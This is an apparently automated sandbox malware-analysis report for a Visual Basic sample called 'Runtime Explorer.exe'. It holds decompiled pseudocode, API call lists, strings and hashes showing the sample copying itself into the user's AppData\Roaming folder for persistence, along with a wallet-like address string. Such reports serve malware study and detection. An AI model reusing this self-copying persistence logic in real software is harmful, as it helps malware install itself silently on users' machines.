              • Source File: 00000000.00000002.699080451.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.699077488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.699098890.0000000000419000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.699104365.000000000041A000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Runtime Explorer.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Free$LateMove$EachVarg$#617#712#716CallNextNofreeUnlock
              • String ID: 0x0$0xC4eABEc8CCb1db4db76A2CA716B03D0ae7b8d929$Execute$Global$IgnoreCase$Pattern$VBScript.RegExp
              • API String ID: 3083996531-1087463468
              • Opcode ID: 9560e0b29269f3875ba8a432f49936d4ac5360cc206d81ed3f8be69714d4ff85
              • Instruction ID: 437b0ff55e8cfd2a6056939db9a860d7f5bca778b1d29b0faffde707b7e6d408
              • Opcode Fuzzy Hash: 9560e0b29269f3875ba8a432f49936d4ac5360cc206d81ed3f8be69714d4ff85
              • Instruction Fuzzy Hash: D3710972C00218AADB10EFA6CD81EDEB7BCBB09304F50427FE909B7591DB785A498F55
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 36%
              			E004132DF(void* __ebx, void* __ecx, void* __edi, void* __esi) {
              				intOrPtr _v8;
              				intOrPtr _v12;
              				char _v24;
              				char _v28;
              				char _v32;
              				void* _v36;
              				char _v52;
              				char _v68;
              				intOrPtr _v76;
              				char _v84;
              				char _v100;
              				intOrPtr _v108;
              				char _v116;
              				char* _v124;
              				char _v132;
              				char _v172;
              				intOrPtr _v180;
              				char* _t53;
              				void* _t56;
              				intOrPtr* _t57;
              				intOrPtr _t58;
              				char* _t60;
              				char* _t70;
              				char* _t85;
              				intOrPtr* _t90;
              				intOrPtr* _t91;
              				char _t92;
              				intOrPtr _t98;
              				intOrPtr _t105;
              
              				_push(0x401256);
              				_push( *[fs:0x0]);
              				 *[fs:0x0] = _t98;
              				_v12 = _t98 - 0xc4;
              				_v8 = 0x4011b8;
              				_push(0);
              				_push(L"scripting.filesystemobject");
              				_push( &_v52);
              				_v24 = 0;
              				_v28 = 0;
              				_v32 = 0;
              				_v36 = 0;
              				_v52 = 0;
              				_v68 = 0;
              				_v84 = 0;
              				_v100 = 0;
              				_v116 = 0;
              				_v132 = 0;
              				L004012F2();
              				_t53 =  &_v52;
              				_push(_t53);
              				L00401382();
              				_push(_t53);
              				_push( &_v24);
              				L00401388();
              				L00401352();
              				_t105 =  *0x4193b8; // 0x211e8f4
              				if(_t105 == 0) {
              					_push(0x4193b8);
              					_push(0x411cb4);
              					L0040131C();
              				}
              				_t90 =  *0x4193b8; // 0x211e8f4
              				_t56 =  *((intOrPtr*)( *_t90 + 0x14))(_t90,  &_v36);
              				asm("fclex");
              				if(_t56 < 0) {
              					_push(0x14);
              					_push(0x411ca4);
              					_push(_t90);
              					_push(_t56);
              					L00401322();
              				}
              				_t57 = _v36;
              				_t91 = _t57;
              				_t58 =  *((intOrPtr*)( *_t57 + 0x50))(_t57,  &_v28);
              				asm("fclex");
              				if(_t58 < 0) {
              					_push(0x50);
              					_push(0x411d5c);
              					_push(_t91);
              					_push(_t58);
              					L00401322();
              				}
              				_push(_v28);
              				_push(0x411d70);
              				L00401364();
              				L0040136A();
              				_t85 = L"Runtime Explorer.exe";
              				_push(_t58);
              				_push(_t85);
              				L00401364();
              				_t92 = 8;
              				_v108 = _t58;
              				_v116 = _t92;
              				_v124 = L"USERPROFILE";
              				_v132 = _t92;
              				L00401376();
              				_push( &_v52);
              				_t60 =  &_v68;
              				_push(_t60);
              				L004012FE();
              				_push(L"\\AppData\\Roaming\\");
              				_push(_t85);
              				L00401364();
              				_v84 = _t92;
              				asm("movsd");
              				_v76 = _t60;
              				asm("movsd");
              				_push( &_v68);
              				asm("movsd");
              				_push( &_v84);
              				_push( &_v100);
              				_v172 = 0;
              				_v180 = 0xb;
              				asm("movsd");
              				L00401304();
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				_push(3);
              				_push(L"copyfile");
              				_push(_v24);
              				asm("movsd");
              				L004012EC();
              				_push( &_v32);
              				_push( &_v28);
              				_push(2);
              				L004012E0();
              				L0040132E();
              				_push( &_v100);
              				_push( &_v116);
              				_push( &_v84);
              				_push( &_v68);
              				_t70 =  &_v52;
              				_push(_t70);
              				_push(5);
              				L00401370();
              				_push(0x4134e8);
              				L0040132E();
              				return _t70;
              			}


              APIs
              • #716.MSVBVM60(?,scripting.filesystemobject,00000000), ref: 00413334
              • __vbaObjVar.MSVBVM60(?,?,scripting.filesystemobject,00000000), ref: 0041333D
              • __vbaObjSetAddref.MSVBVM60(?,00000000,?,?,scripting.filesystemobject,00000000), ref: 00413347
              • __vbaFreeVar.MSVBVM60(?,00000000,?,?,scripting.filesystemobject,00000000), ref: 0041334F
              • __vbaNew2.MSVBVM60(00411CB4,004193B8,?,00000000,?,?,scripting.filesystemobject,00000000), ref: 00413366
              • __vbaHresultCheckObj.MSVBVM60(00000000,0211E8F4,00411CA4,00000014), ref: 0041338A
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411D5C,00000050), ref: 004133AD
              • __vbaStrCat.MSVBVM60(00411D70,?), ref: 004133BA
              • __vbaStrMove.MSVBVM60(00411D70,?), ref: 004133C4
              • __vbaStrCat.MSVBVM60(Runtime Explorer.exe,00000000,00411D70,?), ref: 004133D0
              • __vbaVarDup.MSVBVM60(Runtime Explorer.exe,00000000,00411D70,?), ref: 004133EE
              • #666.MSVBVM60(?,?,Runtime Explorer.exe,00000000,00411D70,?), ref: 004133FB
              • __vbaStrCat.MSVBVM60(Runtime Explorer.exe,\AppData\Roaming\,?,?,Runtime Explorer.exe,00000000,00411D70,?), ref: 00413406
              • __vbaVarCat.MSVBVM60(?,?,?,?), ref: 00413439
              • __vbaLateMemCall.MSVBVM60(?,copyfile,00000003), ref: 00413462
              • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,copyfile,00000003), ref: 00413471
              • __vbaFreeObj.MSVBVM60 ref: 0041347C
              • __vbaFreeVarList.MSVBVM60(00000005,?,?,?,?,?), ref: 00413497
              • __vbaFreeObj.MSVBVM60(004134E8), ref: 004134E2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.699080451.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.699077488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.699098890.0000000000419000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.699104365.000000000041A000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Runtime Explorer.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Free$CheckHresultList$#666#716AddrefCallLateMoveNew2
              • String ID: Runtime Explorer.exe$USERPROFILE$\AppData\Roaming\$copyfile$scripting.filesystemobject
              • API String ID: 2937482936-234267195
              • Opcode ID: a6cad4b28bbebee194cb7668e0bbd5620b85ed40868f6871c5801333adbf4217
              • Instruction ID: 996c4d494a1dcaa6ac0b3908e8cf92c437ceb775abe36d85dbc6a26b9bbe962e
              • Opcode Fuzzy Hash: a6cad4b28bbebee194cb7668e0bbd5620b85ed40868f6871c5801333adbf4217
              • Instruction Fuzzy Hash: 1C512CB1D00218AADB11EFD5CC82EEFB7B8BB08704F50012FF905B7191DB785A458BA9
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 61%
              			E004131B9(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
              				char _v8;
              				intOrPtr _v12;
              				intOrPtr _v16;
              				char _v28;
              				char _v36;
              				char _v52;
              				char _v68;
              				intOrPtr _v76;
              				char _v84;
              				char _v100;
              				char* _v108;
              				char _v116;
              				intOrPtr* _t33;
              				char* _t36;
              				char* _t39;
              				char* _t43;
              				char _t52;
              				char _t54;
              				void* _t55;
              				void* _t57;
              				intOrPtr _t58;
              
              				_t58 = _t57 - 0xc;
              				 *[fs:0x0] = _t58;
              				_v16 = _t58 - 0x64;
              				_v12 = 0x4011a8;
              				_t54 = 0;
              				_v8 = 0;
              				_t33 = _a4;
              				 *((intOrPtr*)( *_t33 + 4))(_t33, __edi, __esi, __ebx,  *[fs:0x0], 0x401256, _t55);
              				_v116 = 0;
              				_t52 = 8;
              				_v28 = 0;
              				_v36 = 0;
              				_v52 = 0;
              				_v68 = 0;
              				_v84 = 0;
              				_v100 = 0;
              				_v108 = L"USERPROFILE";
              				_v116 = _t52;
              				L00401376();
              				_push( &_v52);
              				_t36 =  &_v68;
              				_push(_t36);
              				L004012FE();
              				_push(L"\\AppData\\Roaming\\");
              				_push(L"Runtime Explorer.exe");
              				L00401364();
              				_v76 = _t36;
              				_push(0);
              				_push( &_v68);
              				_v84 = _t52;
              				_push( &_v84);
              				_t39 =  &_v100;
              				_push(_t39);
              				L00401304();
              				_push(_t39);
              				L0040130A();
              				L0040136A();
              				_push( &_v100);
              				_push( &_v84);
              				_push( &_v68);
              				_t43 =  &_v52;
              				_push(_t43);
              				_push(4);
              				L00401370();
              				_push(_v28);
              				L004012F8();
              				if(_t43 > 0) {
              					_t54 = 0xffffffff;
              				}
              				_v36 = _t54;
              				_push(0x4132b8);
              				L0040135E();
              				return _t43;
              			}


              APIs
              • __vbaVarDup.MSVBVM60 ref: 00413218
              • #666.MSVBVM60(?,?), ref: 00413225
              • __vbaStrCat.MSVBVM60(Runtime Explorer.exe,\AppData\Roaming\,?,?), ref: 00413234
              • __vbaVarCat.MSVBVM60(?,?,?,00000000,Runtime Explorer.exe,\AppData\Roaming\,?,?), ref: 0041324C
              • #645.MSVBVM60(00000000,?,?,?,00000000,Runtime Explorer.exe,\AppData\Roaming\,?,?), ref: 00413252
              • __vbaStrMove.MSVBVM60(00000000,?,?,?,00000000,Runtime Explorer.exe,\AppData\Roaming\,?,?), ref: 0041325C
              • __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?,00000000,?,?,?,00000000,Runtime Explorer.exe,\AppData\Roaming\,?,?), ref: 00413273
              • __vbaLenBstr.MSVBVM60(?,?,?), ref: 0041327E
              • __vbaFreeStr.MSVBVM60(004132B8,?,?,?), ref: 004132B2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.699080451.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.699077488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.699098890.0000000000419000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.699104365.000000000041A000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Runtime Explorer.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Free$#645#666BstrListMove
              • String ID: Runtime Explorer.exe$USERPROFILE$\AppData\Roaming\
              • API String ID: 791460665-2394704127
              • Opcode ID: b51dfa843716020f90707b7e29e11eb38c24faf6b0f88f8928f1edbc13fd233d
              • Instruction ID: 8ef88586b5f0747de2335305d67283a2201f3efa1a4c12fb1985bd7ea7afe5d0
              • Opcode Fuzzy Hash: b51dfa843716020f90707b7e29e11eb38c24faf6b0f88f8928f1edbc13fd233d
              • Instruction Fuzzy Hash: 7431C3B2D00228AADB11EFE5CD469DEBBBCBB08704F10426FF905B7691DB785605CB94
              Uniqueness

              Uniqueness Score: -1.00%